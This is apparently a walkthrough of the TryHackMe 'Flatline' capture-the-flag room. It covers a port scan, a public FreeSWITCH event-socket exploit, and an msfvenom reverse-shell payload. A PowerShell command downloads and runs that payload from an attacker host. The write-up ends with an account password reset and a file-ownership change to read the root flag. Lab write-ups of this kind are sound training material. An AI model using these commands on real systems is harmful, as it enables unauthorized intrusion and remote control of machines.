THM FLATLINE Walkthrough
Target IP: 10.10.152.43
#scanning IP
nmap 10.10.152.43 -Pn -p- — min-rate 1000 -A -vv
#ports open
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
8021/tcp open freeswitch-event syn-ack ttl 125 FreeSWITCH mod_event_socket
#3389
tried bruteforcing the logins but did not work.
#8021
found one exploit for this →
https://www.exploit-db.com/exploits/47799
after reading the exploit
#how to use it
./freeswitch-exploit.py 192.168.1.100 whoami
then copied this exploit on my machine and run it to test if it’s working or not
— — — — —
python3 exploit.py 10.10.152.43 whoami 130 ⨯
Authenticated
Content-Type: api/response
Content-Length: 25
win-eom4pk0578n\nekrotic
— — — — — -
so yeah it was working and now we just have to craft a “Windows Stageless reverse TCP”
if don’t know how u can check here:
“msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe”
and then give command to the target machine to download this malicious .exe file from our server (python), on it’s system and run it
which will be done by giving a
Invoke Web Request Command (Invoke-WebRequest -Uri <source> -OutFile <destination>) and .\reverse.exe (file run command) by using the exploit we have
so the command will be like this
python3 exploit.py 10.10.152.43 “powershell.exe Invoke-WebRequest -Uri http://<attacker_IP>:<port>/path_to_file -OutFile ./reverse.exe && .\reverse.exe “
keep in mind: have a terminal runnning listener on the port where the connection will be (according to the msfvenome exe file we created)
if you have done all the steps correctly you should have a reverse shell.
##NOW TO GET THE USER FLAG :
it is present in the desktop of Nekrotic
C:\Users\Nekrotic\Desktop>type user.txt
………….{FLAG}…………..
NOW FOR THE ROOT FLAG :
We can see there is a root flag in the same location but when i try to read it but i couldn’t, obviously it won’t be that easy.
— — — — — — — — -
C:\Users\Nekrotic\Desktop>type root.txt
type root.txt
Access is denied.
— — — — — — — — —
lets enumerate our user Nekrotic
— — — — — — — — — — — — — — -
C:\Users\Nekrotic>net user nekrotic
net user nekrotic
User name Nekrotic
Full Name Nekrotic
Comment
User’s comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 09/11/2021 07:16:49
Password expires Never
Password changeable 09/11/2021 07:16:49
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 28/02/2022 06:46:10
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
— — — — — — — — -
It has administrator privellege but still unable to read the file
lets change the password and login through port 3389, which i tried to bruteforce in the start.
— — — — — — — — — — —
C:\Users\Nekrotic>net user nekrotic W3bH3@d
net user nekrotic W3bH3@d
The command completed successfully.
— — — — — — — — — — — -
let’s log in through REMMINA
when trying to read the root.txt we get this error.
as we don’t have the permission to open the file, but if we make changes in the ownership then we can possibly read it. Let’s try doing that.
the rdp is so slow ……………. i m solving my cube everytime in between every couple of steps, and i am not even good at it.
changed the owner to nekrotic.
now i will just close and reopen the properties of root.txt to make changes .
after making changes to the groups, i can now read the file.
AND THE ROOM IS COMPLETED!!!
HAPPY HACKING 🥳.
